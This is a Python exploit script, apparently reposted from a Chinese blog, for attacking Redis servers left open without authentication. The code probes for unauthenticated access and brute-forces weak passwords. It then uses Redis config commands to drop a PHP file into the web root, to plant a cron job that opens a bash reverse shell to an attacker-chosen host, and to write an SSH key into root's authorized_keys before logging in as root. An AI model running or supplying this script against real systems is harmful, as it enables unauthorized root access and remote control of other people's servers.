#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import socket
import sys
import os
class PAYLOAD(object):
def __init__(self,ip,port,timeout):
self.ip=ip
self.port=port
self.timeout=timeout
self.PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(self):
'''
检查redis是否存在未授权漏洞,或者存在弱密码
:return:
'''
try:
socket.setdefaulttimeout(self.timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, int(self.port)))
s.send(b"INFO\r\n")
result = s.recv(1024).decode('utf-8')
if "redis_version" in result:
return u"未授权访问"
elif "Authentication" in result:
for pass_ in self.PASSWORD_DIC:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send(b"AUTH %s\r\n" %(pass_))
result = s.recv(1024).decode('utf-8')
if '+OK' in result:
return u"存在弱口令,密码:%s" % (pass_)
except Exception as e:
print(e)
def upload_phpinfo(self):
'''
通过redis未授权漏洞上传phpinfo
:return:
'''
try:
socket.setdefaulttimeout(self.timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, int(self.port)))
s.send(b"config set dir /var/www/html\r\n")
print('config set dir /var/www/html')
print(s.recv(1024).decode('utf-8'))
s.send(b"config set dbfilename redis1.php\r\n")
print('config set dbfilename redis1.php')
print(s.recv(1024).decode('utf-8'))
s.send(b'set x \"<?php phpinfo();?>"\r\n')
print('set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n"')
print(s.recv(1024).decode('utf-8'))
s.send(b'save\r\n')
print('save')
print(s.recv(1024).decode('utf-8'))
except Exception as e:
print(e)
def recerive_tcp(self,rhost,rport):
'''
使用redis未授权漏洞,上传反弹链接
方法未成功
:return:
'''
try:
socket.setdefaulttimeout(self.timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, int(self.port)))
s.send(b"config set dir /var/spool/cron\r\n")
print('config set dir /var/spool/cron')
print(s.recv(1024).decode('utf-8'))
s.send(b"config set dbfilename root\r\n")
print('config set dbfilename root')
print(s.recv(1024).decode('utf-8'))
s.send('set xxx "*/1 * * * * /bin/bash -i>&/dev/tcp/{}/{} 0>&1"\r\n'.format(rhost,rport).encode('utf-8'))
print('set xxx "*/1 * * * * /bin/bash -i>&/dev/tcp/{}/{} 0>&1"'.format(rhost,rport))
print(s.recv(1024).decode('utf-8'))
s.send(b'save\r\n')
print('save')
print(s.recv(1024).decode('utf-8'))
except Exception as e:
print(e)
def ssh_connect(self):
'''
利用‘公私钥’实现获取root权限
:return:
'''
try:
os.system('ssh-keygen -t rsa') #生成公私钥
os.system('(echo -e "\n\n" ; cat /root/.ssh/id_rsa.pub ; echo -e "\n\n") > /root/.ssh/public.txt')
os.system('cat /root/.ssh/public.txt | redis-cli -h {} -p {} -x set authorized_keys'.format(self.ip,self.port)) #将公钥放到redia数据库中
socket.setdefaulttimeout(self.timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, int(self.port)))
s.send(b"config set dir /root/.ssh\r\n")
print('config set dir /root/.ssh')
print(s.recv(1024).decode('utf-8'))
s.send(b"config set dbfilename authorized_keys\r\n")
print('config set dbfilename authorized_keys')
print(s.recv(1024).decode('utf-8'))
s.send(b'save\r\n')
print('save')
print(s.recv(1024).decode('utf-8'))
os.system('ssh -i id_rsa root@{}'.format(self.ip)) # 使用私钥连接
except Exception as e:
print(e)
if __name__ == '__main__':
ip=sys.argv[1]
port=sys.argv[2]
p=PAYLOAD(ip,port,timeout=20)
p.ssh_connect()
redis未授权漏洞利用脚本
最新推荐文章于 2024-06-13 22:54:47 发布